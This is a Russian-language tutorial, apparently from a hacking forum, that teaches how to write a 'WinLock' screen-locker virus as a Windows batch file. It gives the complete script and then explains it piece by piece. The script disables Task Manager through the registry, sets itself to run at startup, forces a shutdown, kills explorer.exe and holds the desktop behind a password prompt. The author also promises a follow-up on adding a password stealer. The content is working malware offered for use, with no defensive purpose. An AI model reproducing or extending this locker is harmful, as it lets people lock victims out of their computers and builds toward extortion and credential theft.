
Сегодня я роскажу вам как сделать обычный вин лок. Для тех, кто не знает что ето - гугл в помощь!
Вирус будем писать с помошью батника. Ето обычный вин лок, который состоит из 1 файла. Сразу кину весь код:
@echo off cd %windr% if exist %windr%\start.txt goto go echo 1 > start.txt reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v tray /t REG_SZ /d C:\Windows\имя вируса.bat /f Shutdown /t 0 /s :go taskkill /im explorer.exe /f >nul title VIRUS — WinLock color 0A echo
Привет! Я - вирус! pause > nul cls echo Ваш пароль: :metka set /p x= if %x%==121212121212 (echo Правильно! reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f >nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v tray /f >nul start explorer del %0 exit )ELSE ( echo Не правильно. ето не%x% ) goto metka
Как видите в нем нету ничего сложного. Вирус создает "левый" файл, который служит опорной точкой для запуска, потом снимает процес explorer.exe, пишет " Привет, я вирус!" и запашивает пароль. Кто не понял - читайте ниже.
Теперь давайте разберем код по частям:
@echo off cd %windr% if exist %windr%\start.txt goto go echo 1 > start.txt reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v tray /t REG_SZ /d C:\Windows\имя вируса.bat /f Shutdown /t 0 /s
переходим в директорию windows и создаем там файл start.txt он нам нужен, т.к. мы будем перезагружать наш комп. Следующие 2 строчки запрещают диспеччер задач и прописывают наш файл в автозагрузку.
taskkill /im explorer.exe /f >nul title VIRUS — WinLock color 0A echo
Привет! Я - вирус! pause > nul cls echo Ваш пароль:
Тут мы разговариваем с позльзователем
:metka set /p x= if %x%==121212121212 (echo Правильно! reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f >nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v tray /f >nul start explorer del %0 exit )ELSE ( echo Не правильно. ето не%x% ) goto metka
Ето -основная часть вин лока(как правило она особо не отличается). Здесь мы создаем метку, задаем значения пароля 121212121212, и если правильно - снимаем себя с загрузки, даем добро на пользование диспеччером задач, удаляем себя и все!
Ну вот и все! Конечно, мождно добавить в вирус много другого... ну например вор логинов и паролей... но об етом статья будет потом. |